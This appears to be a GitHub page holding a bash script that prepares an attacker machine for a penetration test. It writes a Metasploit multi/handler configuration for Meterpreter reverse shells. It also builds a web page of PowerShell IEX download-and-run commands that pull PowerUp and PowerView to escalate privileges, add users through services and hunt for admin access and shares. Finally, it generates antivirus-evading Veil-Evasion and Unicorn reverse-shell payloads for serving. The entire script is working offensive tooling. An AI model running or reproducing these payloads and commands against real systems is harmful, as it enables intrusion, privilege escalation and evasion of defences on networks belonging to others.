Tools/pentest_prep.sh at master · Sw4mpf0x/Tools · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#/bin/bash
#Usage
display_usage(){
	clear
	echo "============================================================"
	echo "This script requires a LHOST IP address."
	echo ""
	echo "Usage: $0 10.10.10.10"
	echo "============================================================"
	echo ""
}

if [ $# -le 0 ]
	then
		display_usage
		exit 0
fi

#MSF resource file

echo "use exploit/multi/handler" > /bounce
echo "jobs -K" >> /bounce
echo "set payload windows/meterpreter/reverse_tcp" >> /bounce
echo "set exitonsession false" >> /bounce
echo "set lport 53" >> /bounce
echo "set enablestageencoding true" >> /bounce
echo "set autorunscript migrate -f" >> /bounce
echo "set LHOST $1" >> /bounce
echo "exploit -j -z" >> /bounce

echo "set payload windows/meterpreter/reverse_https" >> /bounce
echo "set lport 443" >> /bounce
echo "exploit -j -z" >> /bounce

#Setup /var/www/cmd.html page

echo "<b>Invoke-AllChecks</b><p><p>" > /var/www/cmd.html
echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/PowerUp.ps1'); Invoke-Allchecks\"" >> /var/www/cmd.html
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Write-UserAddServiceBinary</b><p><p>" >> /var/www/cmd.html
echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/PowerUp.ps1'); Write-UserAddServiceBinary -ServiceName SQLRODBC\"" >> /var/www/cmd.html
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Invoke-ServiceUserAdd</b><p><p>" >> /var/www/cmd.html
echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/PowerUp.ps1'); Invoke-ServiceUserAdd -ServiceName spooler\"" >> /var/www/cmd.html
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Invoke-FindLocalAdminAccess</b><p><p>" >> /var/www/cmd.html
echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/powerview.ps1'); Invoke-FindLocalAdminAccess\"" >> /var/www/cmd.html
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Invoke-userhunter</b><p><p>" >> /var/www/cmd.html
echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/powerview.ps1'); Invoke-userhunter\"" >> /var/www/cmd.html
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Invoke-ShareFinder</b><p><p>" >> /var/www/cmd.html
echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/powerview.ps1'); Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii found_shares.txt\"" >> /var/www/cmd.html

#Setup Veil payloads
rm /root/HTTPS_443.exe
rm /root/TCP_53.exe
rm /root/power443.txt
rm /root/power53.txt
rm /var/www/HTTPS_443.exe
rm /var/www/TCP_53.exe
rm /var/www/power443.txt
rm /var/www/power53.txt

rm /usr/share/veil-evasion/compiled/HTTPS_443.exe
rm /usr/share/veil-evasion/handlers/HTTPS_443_handler.rc
rm /usr/share/veil-evasion/source/HTTPS_443.rb
/root/tools/Veil-Evasion/Veil-Evasion.py -p ruby/meterpreter/rev_https -c LPORT=443 LHOST=$1 -o HTTPS_443
cp /usr/share/veil-evasion/compiled/HTTPS_443.exe /root/HTTPS_443.exe
cp /usr/share/veil-evasion/compiled/HTTPS_443.exe /var/www/HTTPS_443.exe

rm /usr/share/veil-evasion/compiled/TCP_53.exe
rm /usr/share/veil-evasion/handlers/TCP_53_handler.rc
rm /usr/share/veil-evasion/source/TCP_53.rb
/root/tools/Veil-Evasion/Veil-Evasion.py -p ruby/meterpreter/rev_tcp -c LPORT=53 LHOST=$1 -o TCP_53
cp /usr/share/veil-evasion/compiled/TCP_53.exe /root/TCP_53.exe
cp /usr/share/veil-evasion/compiled/TCP_53.exe /var/www/TCP_53.exe

#Setup Unicorn payload
python /root/tools/unicorn/unicorn.py windows/meterpreter/reverse_https $1 443
cp /root/tools/powershell_attack.txt /root/power443.txt
cp /root/tools/powershell_attack.txt /var/www/power443.txt
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Powershell HTTPS Payload</b><p><p>" >> /var/www/cmd.html
cat /root/power443.txt >> /var/www/cmd.html

python /root/tools/unicorn/unicorn.py windows/meterpreter/reverse_tcp $1 53
cp /root/tools/powershell_attack.txt /root/power53.txt
cp /root/tools/powershell_attack.txt /var/www/power53.txt
echo "<p><p>" >> /var/www/cmd.html
echo "<b>Powershell TCP Payload</b><p><p>" >> /var/www/cmd.html
cat /root/power53.txt >> /var/www/cmd.html